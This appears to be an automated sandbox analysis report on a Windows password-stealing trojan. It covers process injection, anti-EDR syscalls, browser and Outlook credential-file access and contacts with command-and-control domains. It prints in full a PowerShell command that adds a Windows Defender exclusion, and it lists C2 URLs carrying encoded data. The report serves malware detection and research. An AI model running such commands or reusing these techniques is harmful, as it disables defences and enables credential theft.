            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, ----------------.csReference to suspicious API methods: LoadLibrary(_EE23_EECD_EE92_EE00_EED9_0E69_EEB8_0E6F_EE1E_EEE6_EE08_EE56_EEC8_EE11_0651_EC7E_0605_08EB(_EE36_EE50_060A_EE59_08E2_EEE7_08E5_0658_EEF6_EE7A_066C_08F7_EEA1_EE16_EE1B_EC9F._EE88_0614_EEF8_EED2_ECAA))
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe" -Force
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe" -ForceJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeMemory allocated: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 400000 protect: page execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtOpenKeyEx: Direct from: 0x77383C9CJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtClose: Direct from: 0x77382B6C
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtQueryValueKey: Direct from: 0x77382BECJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeNtProtectVirtualMemory: Direct from: 0x77377B2EJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeMemory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: NULL target: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: NULL target: C:\Windows\SysWOW64\sc.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: NULL target: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: NULL target: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeThread register set: target process: 2876Jump to behavior
            Source: C:\Windows\SysWOW64\sc.exeThread APC queued: target process: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeMemory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 400000Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeMemory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 401000Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeMemory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 2B19008Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe" -ForceJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"Jump to behavior
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\SysWOW64\sc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess created: C:\Windows\SysWOW64\unregmp2.exe "C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
            Source: C:\Windows\SysWOW64\unregmp2.exeProcess created: C:\Windows\System32\unregmp2.exe "C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT
            Source: NwXvnHITawmpBkkZKEXJ.exe, 0000000B.00000002.3944876648.0000000001761000.00000002.00000001.00040000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000B.00000000.2245274467.0000000001760000.00000002.00000001.00040000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000E.00000002.3945565356.0000000001AC1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: IProgram Manager
            Source: NwXvnHITawmpBkkZKEXJ.exe, 0000000B.00000002.3944876648.0000000001761000.00000002.00000001.00040000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000B.00000000.2245274467.0000000001760000.00000002.00000001.00040000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000E.00000002.3945565356.0000000001AC1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: NwXvnHITawmpBkkZKEXJ.exe, 0000000B.00000002.3944876648.0000000001761000.00000002.00000001.00040000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000B.00000000.2245274467.0000000001760000.00000002.00000001.00040000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000E.00000002.3945565356.0000000001AC1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: NwXvnHITawmpBkkZKEXJ.exe, 0000000B.00000002.3944876648.0000000001761000.00000002.00000001.00040000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000B.00000000.2245274467.0000000001760000.00000002.00000001.00040000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000E.00000002.3945565356.0000000001AC1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe | Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb VolumeInformation
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Queries volume information: \Device\CdRom0\ VolumeInformation
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\unregmp2.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\unregmp2.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Lowering of HIPS / PFW / Operating System Security Settings

            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA
            Source: Amcache.hve.9.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.9.dr | Binary or memory string: msmpeng.exe
            Source: Amcache.hve.9.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: Amcache.hve.9.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
            Source: Amcache.hve.9.dr | Binary or memory string: MsMpEng.exe

            Stealing of Sensitive Information

            Source: Yara match | File source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0000000D.00000002.3944875828.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.2322232096.00000000035F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000E.00000002.3948817261.00000000057D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.2321692626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000D.00000002.3945190684.00000000032D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.3945837611.00000000038C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.2322275427.00000000040C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\sc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\sc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\sc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\sc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\sc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\sc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\sc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\sc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\sc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara match | File source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0000000D.00000002.3944875828.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.2322232096.00000000035F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000E.00000002.3948817261.00000000057D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.2321692626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000D.00000002.3945190684.00000000032D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.3945837611.00000000038C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.2322275427.00000000040C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            MITRE ATT&CK Matrix (techniques listed per tactic column; numbers in parentheses are those shown next to each technique in the matrix)

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
            Initial Access: Replication Through Removable Media (1); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
            Execution: Native API (1); Service Execution (1); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
            Persistence: DLL Side-Loading (1); Windows Service (1); Registry Run Keys / Startup Folder (1); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
            Privilege Escalation: Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Windows Service (1); Process Injection (612); Registry Run Keys / Startup Folder (1); RC Scripts; Startup Items; Scheduled Task/Job
            Defense Evasion: Disable or Modify Tools (21); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (3); DLL Side-Loading (1); Masquerading (11); Virtualization/Sandbox Evasion (41); Process Injection (612)
            Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
            Discovery: Peripheral Device Discovery (11); File and Directory Discovery (3); System Information Discovery (113); Security Software Discovery (231); Process Discovery (2); Virtualization/Sandbox Evasion (41); Application Window Discovery (1); System Owner/User Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
            Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
            Command and Control: Ingress Tool Transfer (3); Encrypted Channel (1); Non-Application Layer Protocol (4); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
            Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
            Behavior Graph (ID: 1467140, Sample: SecuriteInfo.com.Win64.PWSX..., Startdate: 03/07/2024, Architecture: WINDOWS, Score: 100). The rendered graph is not recoverable; the nodes and edges it contained are listed below.

            Top-level signatures: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 8 other signatures
            Top-level DNS/IP nodes: www.vertilehub.xyz (Performs DNS queries to domains with low reputation); www.xuzfceth.com; 14 other IPs or domains

            Process tree (signatures attached to each process in brackets):
            • SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, started [Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; Allocates memory in foreign processes; 3 other signatures]
              • wmplayer.exe, started [Maps a DLL or memory area into another process]
                • NwXvnHITawmpBkkZKEXJ.exe, injected [Found direct / indirect Syscall (likely to bypass EDR)]
                  • sc.exe, started [Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures]
                    • NwXvnHITawmpBkkZKEXJ.exe, injected [Found direct / indirect Syscall (likely to bypass EDR)]; network contacts: www.vertilehub.xyz 203.161.49.220 (ports 49737, 49738, 49739; VNPT-AS-VNVNPTCorpVN Malaysia), www.xuzfceth.com 152.32.156.214 (ports 49741, 49743, 49744; UHGL-AS-APUCloudHKHoldingsGroupLimitedHK Hong Kong), 8 other IPs or domains
                    • firefox.exe, started
              • powershell.exe, started [Loading BitLocker PowerShell Module]
                • WmiPrvSE.exe, started
                • conhost.exe, started
              • WerFault.exe, started
              • 2 other processes
            • wmplayer.exe, started
              • unregmp2.exe, started
                • unregmp2.exe, started
            • wmplayer.exe, started

            Source | Detection | Scanner | Label | Link
            SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe | 21% | ReversingLabs | Win64.Trojan.Generic
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches

            Source | Detection | Scanner | Label | Link
            http://upx.sf.net | 0% | URL Reputation | safe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
            https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
            https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
            http://www.salecost.co.uk/lxk5/?3pSl=bXiTJHhxyN&Z6ZTG=zj5keJbhqHRqpBHEzEPKOuQbxRjm8qWuWsd9F2eyqHWyZ50o0GVe7MC2nYinXopw20BlJsxmZQL4Qtg6IXTgBkLaiZkxb6ZcnHHrEYQse9ZTnJ7WfQRHJgpeqyDS6bOga2ykoHk= | 0% | Avira URL Cloud | safe
            http://www.limpiezasbarcelo.com/utkc/?Z6ZTG=xUiyaqLJoScYwvSKxaGp/hpT2WjKlz4HgwmTPdW94fPPmC4rv/t3tHuSJrzPzR7paXxk8earaiLam3RcAVyJFQBqD9wWwb3EOl9ToIAQBz3Abx7ULfREDyg8fvDjES+swyckS94=&3pSl=bXiTJHhxyN | 0% | Avira URL Cloud | safe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe
            http://www.le-kuk.shop/obdd/?3pSl=bXiTJHhxyN&Z6ZTG=iAqH8h/tGKVhLv76hXtDkp/tsoNJZUwghhFRVhBlXKA5k0wUKDpGIsk5Z77aZpW07kzVnHl6/cD+xmMbGt3tKENSOXeInUOEjIwpy90PuGUlpE2byY+FLaYtfu+R+h2f+4odIwk= | 0% | Avira URL Cloud | safe
            http://www.bayviewcribbage.com/odz6/ | 0% | Avira URL Cloud | safe
            http://www.xuzfceth.com/wvfe/ | 0% | Avira URL Cloud | safe
            http://www.videos60.com/hfmm/ | 0% | Avira URL Cloud | safe
            https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe
            https://www.united-domains.de/email_website/homepage-baukasten/ | 0% | Avira URL Cloud | safe
            https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe
            http://www.salecost.co.uk/lxk5/ | 0% | Avira URL Cloud | safe
